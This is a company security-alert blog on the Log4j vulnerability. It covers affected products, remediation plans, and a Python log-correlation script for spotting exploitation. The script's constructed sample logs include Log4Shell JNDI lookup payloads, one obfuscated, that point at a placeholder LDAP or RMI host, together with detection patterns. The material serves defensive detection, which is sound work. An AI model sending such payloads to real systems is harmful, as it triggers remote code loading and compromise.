UPDATE: December 21, 2021 - We have identified the products Systems Engineering sells and supports that are impacted by the log4j vulnerability. Affected products are listed below along with our plans to address each.
- The following products will be addressed during scheduled network administration engagements for those customers with SE NetAdmin service.
  - Symantec Endpoint Protection Manager. Please note this is NOT the product we use for our SE Essentials, SE Desktop Defense, and SE Secure customers as a managed anti-virus solution.
  - VMware vCenter
- For both products below, we will reach out to customers to scope and schedule remediation.
  - Cisco Identity Service Engine (ISE)
  - NetApp ONTAP
- The vulnerable product below will require an upgrade due to end-of-support.
  - Cisco Call Manager v11.5. Upgrade to v12.5. For customers who have not previously planned this upgrade, we will reach out directly to scope and schedule remediation.
- For the product below, we are waiting on the cloud service provider to apply the patch. (See earlier statements below for more information on this standard practice.)
  - Polycom Real Connect for Teams. The vendor has stated that work will be completed this week.
The log4j vulnerability is a good reminder of why a layered approach to security is important. All the products listed above are behind a firewall that has an intrusion prevention system (IPS) that will detect an attack attempting to use this vulnerability. We are also monitoring our SE EventWatch customers for any log4j indicators of compromise (IOC). Finally, nothing can be a substitute for a regularly scheduled and well-designed security awareness training program.
Customers who may be impacted and would like to engage Systems Engineering on a more immediate basis should reach out to their account manager. We have put an Incident Response procedure in place to address these requests.
SECURITY ALERT UPDATE: December 15, 2021
MOVING FROM EXTERNAL TO INTERNAL THREAT
Since the announcement of this vulnerability, we have seen the cloud service provider industry (those applications our customers and we use from the cloud) rapidly respond to this serious threat. Still, if you have cloud-hosted line of business (LOB) applications, you should be looking for the vendor's response to the Log4j vulnerability and steps they have taken to address this threat if impacted.
We are encouraged to see that external cloud application providers have done an excellent job remediating the risk of this vulnerability. The focus now needs to shift to the internal network.
Systems Engineering is currently cataloging any potential exposure to this vulnerability from our vendors and the products we sell and support. We are heeding their guidance on addressing the vulnerability; then, we will start to scope and prioritize our response. This is our standard practice for internal vulnerabilities that exist, so long as they also have the protection of a firewall. We only deploy approved patches directly from the vendor, rather than looking to various crowd-sourced or vendor workarounds. Such workarounds come at a higher risk and may bring unnecessary disruption to the business.
While Systems Engineering is analyzing this threat, our customers should be cataloging their potential exposures, such as:
- Any application running on your network, in your office, or data center that might be exposed to the Internet. This is not common for most small to medium-sized organizations, but you might have line of business applications with a web interface for third-party or field staff access.
- If you are running any task-specific appliances on your network, these may have administrative interfaces that are vulnerable to this threat.
- If you use IoT devices, like smart thermostats, ensure these are securely separated from your business network.
Finally, continue to follow this blog. We will update as we have more information or the situation changes. You can also call your Systems Engineering Account Manager with any specific questions.
SECURITY ALERT: December 13, 2021
On Saturday, December 11, 2021, CISA released a statement on the "log4j" vulnerability CVE-2021-44228. This is a serious vulnerability affecting any application exposed to the Internet while using the popular Java logging framework Log4j.
While Microsoft Windows and Office 365 are not directly affected, you may be running an on-premises application that uses Java, which should be protected behind a firewall. It is also likely that your cloud or Software-as-a-Service (SaaS) applications are affected.
The other source of exposure is Internet of Things and other network devices that have Java embedded. For devices that Systems Engineering sells and supports, we are monitoring vendor security notifications for exposure and will implement any mitigation steps required.
COURSE OF ACTION
For all businesses, we recommend reviewing statements from your SaaS providers relating to the Log4j vulnerability CVE-2021-44228.
For clients, we are monitoring systems across our SE EventWatch customer base, looking for suspicious activities related to this vulnerability. At this time, we can see inbound activities attempting to exploit this vulnerability. However, we have yet to observe related outbound communications, which would indicate a successful attack.
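The monitoring described here (inbound exploitation attempts versus the outbound communications that would indicate success) and the IPS/IOC monitoring mentioned in the December 21 update both come down to the same two checks: spot requests that carry a JNDI lookup string, and spot Java hosts behind the firewall making outbound connections on the LDAP/RMI ports that such a lookup would use. The script below is an added example written for this post; it is not Systems Engineering's tooling or any vendor's code. The access-log lines, firewall-log lines, IP addresses and the JAVA_SERVERS inventory are all constructed for the example, and the firewall log format is assumed.

```python
import re

# Constructed sample web-server access log lines (Apache combined format);
# the IPs and payloads are made up for this example, not real traffic.
ACCESS_LOG = """\
203.0.113.7 - - [13/Dec/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.9 - - [13/Dec/2021:10:01:16 +0000] "GET /login?user=${${lower:j}ndi:rmi://198.51.100.5:1099/b} HTTP/1.1" 200 512 "-" "curl/7.68.0"
198.51.100.20 - - [13/Dec/2021:10:02:00 +0000] "GET /api/status HTTP/1.1" 200 88 "-" "python-requests/2.26"
"""

# Constructed firewall connection log (assumed CSV layout):
# timestamp,action,src,dst,dst_port,proto,direction
FIREWALL_LOG = """\
2021-12-13T10:01:15Z,allow,10.0.5.12,198.51.100.5,1389,tcp,outbound
2021-12-13T10:01:20Z,allow,10.0.5.12,203.0.113.50,443,tcp,outbound
2021-12-13T10:03:00Z,allow,10.0.5.30,10.0.5.12,8443,tcp,internal
"""

# Assumed asset inventory: internal hosts known to run Java applications.
JAVA_SERVERS = {"10.0.5.12"}
# Ports of the lookup protocols a vulnerable Log4j resolves over (LDAP, LDAPS, RMI).
CALLBACK_PORTS = {389, 636, 1099, 1389}

# Nested lookups such as ${lower:j} or ${::-j} evaluate to the plain character,
# so we resolve them the same way before matching; otherwise a split-up keyword
# would slip past a literal "${jndi:" search.
_SIMPLE_LOOKUPS = [
    (re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I), r"\1"),
    (re.compile(r"\$\{::-([^{}]*)\}"), r"\1"),
]
_JNDI = re.compile(r"\$\{jndi:[^}\s\"]*\}?", re.I)
_HOST_IN_URI = re.compile(r"://([^:/\s\"}]+)")


def normalize_lookups(text):
    """Collapse nested lookups until stable: ${${lower:j}ndi:...} -> ${jndi:...}."""
    prev = None
    while prev != text:
        prev = text
        for pattern, repl in _SIMPLE_LOOKUPS:
            text = pattern.sub(repl, text)
    return text


def find_inbound_attempts(access_log):
    """Return (client_ip, normalized lookup string) for each request carrying a JNDI lookup."""
    hits = []
    for line in access_log.splitlines():
        if not line.strip():
            continue
        client_ip = line.split(" ", 1)[0]
        match = _JNDI.search(normalize_lookups(line))
        if match:
            hits.append((client_ip, match.group(0)))
    return hits


def find_outbound_callbacks(firewall_log):
    """Return (src, dst, port) for outbound connections from Java hosts on JNDI protocol ports."""
    hits = []
    for line in firewall_log.splitlines():
        if not line.strip():
            continue
        _ts, _action, src, dst, port, _proto, direction = line.split(",")
        if src in JAVA_SERVERS and direction == "outbound" and int(port) in CALLBACK_PORTS:
            hits.append((src, dst, int(port)))
    return hits


def assess(access_log=ACCESS_LOG, firewall_log=FIREWALL_LOG):
    """Correlate the two views: an inbound attempt alone is background noise, but an
    attempt whose callback host a Java server then connected to is the signal that matters."""
    attempts = find_inbound_attempts(access_log)
    callbacks = find_outbound_callbacks(firewall_log)
    attempt_hosts = set()
    for _client, payload in attempts:
        m = _HOST_IN_URI.search(payload)
        if m:
            attempt_hosts.add(m.group(1))
    correlated = [cb for cb in callbacks if cb[1] in attempt_hosts]
    return {
        "inbound_attempts": attempts,
        "outbound_callbacks": callbacks,
        "correlated": correlated,
        "possible_compromise": bool(correlated),
    }


if __name__ == "__main__":
    result = assess()
    for client, payload in result["inbound_attempts"]:
        print(f"inbound attempt from {client}: {payload}")
    for src, dst, port in result["outbound_callbacks"]:
        print(f"outbound JNDI-protocol connection {src} -> {dst}:{port}")
    print("possible compromise:", result["possible_compromise"])
```

Run as-is it reports two inbound attempts from the constructed client, one outbound LDAP-port connection from the Java host, and flags a possible compromise because the callback destination matches the host named in the inbound payload. On real logs the asset inventory and the firewall CSV parser are the two pieces to adapt; the correlation step is what separates "we see attempts" from "we see a successful attack," which is the distinction the alert draws.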
With regard to Systems Engineering's own systems, we have verified that we are not affected, are patched, or are deployed in a secure configuration to prevent external access.
We will continue to keep a close eye on this vulnerability and will update this Security Alert as more information becomes available. In the meantime, if you have questions about this Security Alert and are a Systems Engineering customer, please reach out to your Account Manager.